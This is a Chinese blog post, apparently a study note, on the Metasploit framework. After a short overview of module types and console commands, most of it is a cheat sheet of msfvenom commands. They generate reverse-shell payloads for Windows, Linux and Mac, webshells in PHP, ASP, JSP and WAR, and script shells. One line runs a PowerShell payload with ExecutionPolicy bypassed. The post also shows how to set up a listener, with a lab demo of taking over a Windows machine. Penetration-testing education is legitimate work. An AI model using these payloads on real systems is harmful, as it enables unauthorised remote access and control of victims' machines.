msf再学习

msf更新

1
apt install metasploit-framework

msf各个模块

exploits

漏洞利用模块,这个模块通常是用于对某些有可能存在漏洞的目标进行漏洞利用。

payloads

攻击载荷,explo it 成功之后就会执行payload,这段paylo ad可以是反弹代码,可以是添加用户的代码。

auxiliary

辅助模块,该模块是用于辅助渗透的,比如端口扫描、存活探测、暴力破解。

post

后渗透模块,该模块一般用于内网渗透。

encoders

编码器模块,对payload进行编码加密,可绕过部分杀软软件。

evasion

躲避模块,该模块分类下只有4 个,都是为了躲避微软的限制或者是杀软的,免杀效果很一般。

nops

空空指令是对一些程序运行状态不会造成任何实质影响的空操作或者无关操作指令,对于x86 CPU就是0x90。

msf基础命令

启动msf

1
msfconsole

使用模块

1
use 模块名

use 模块名,按两下table键会提示是否显示所有模块

查看漏洞详细信息,漏洞利用模块下执行info,也可以在框架下执行如下代码效果相同,可展示漏洞详细信息

1
info windows/smb/ms17_010_eternalblue

显示模块配置信息,一般情况下显示yes的需要配置,显示no的不需要配置

1
show options

漏洞利用

1
exploit/run

拿到shell 退出保留shell

1
background

在这里插入图片描述

可以看到保存到session会话了

查看保留的会话

1
sessions

在这里插入图片描述

进入会话

1
session [id]

在这里插入图片描述

退出exploit模块

1
back

退出msf

1
exit

反向Payload生成

反向连接为目标机连接攻击机

生成二进制文件

Windows

1
2
3
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

如果是64位需要加上 x64

-p为选择的payload,LHOST为攻击机ip地址,LPORT一般选用常用端口,如21,80,8080,53等,为了防止防火墙拦截

msf下可以使用search payloadmsfvenom -l payloads来搜索payloads,选择要使用的payload

查看所有paylaod

1
msfvenom -l payloads

详细查看模块信息

1
info 模块

在这里插入图片描述

Linux

1
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Mac

1
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

生成webshell脚本

PHP

1
2
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d 'n' > shell.php && pbpaste >> shell.php

ASP

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP

1
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR

1
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

生成其他脚本shell

Python

1
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash

1
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl

1
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

Powershell

1
2
msfvenom -p windows/x64/meterpreter_reverse_http LHOST=<Your IP Address> LPORT= <Your Port to Connect On> -f psh > shell.ps1
powershell.exe -ExecutionPolicy Bypass -File shell.ps1

msf接收

1
2
3
4
5
6
7
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp (这里paylaod要和 msfvenom生成使用的payload一样)
set LHOST 192.168.88.128
set LPORT 4444
set ExitOnSession false
exploit -j -z

-j -z为获取一个shell直接到后台,不在前端回显

反向payload实战演示

目标机为Windows

Kali下生成payload,传到Windows目标机,双击运行

1
msfvenom  -p windows/meterpreter/reverse_tcp LHOST=192.168.94.197 LPORT=4467 -f exe > shell.exe

在这里插入图片描述

msf攻击机配置如下

在这里插入图片描述

注意如果监听过程中一直进不了meterpreter,可能是由于杀毒软件和防火墙限制,还有可能是payload设置位数和目标机不同,如下图为攻击成功

在这里插入图片描述

background进入将meterpreter进入后台

输入shell

1
shell 

可以进入shell ,也就是目标主机模式

目标机器为Linux

生成Linux

1
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

进入Linux机器添加权限后执行

在这里插入图片描述

攻击机配置如上

参:https://choge.top/2019/10/22/msf%E4%B9%8B%E6%AD%A3%E5%8F%8D%E5%90%91payload%E7%94%9F%E6%88%90%E4%B8%8E%E5%AE%9E%E6%88%98/

  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!

扫一扫,分享到微信

微信分享二维码
  • Copyrights © 2021-2023 Wh1tecell
  • 访问人数: | 浏览次数:

请我喝杯咖啡吧~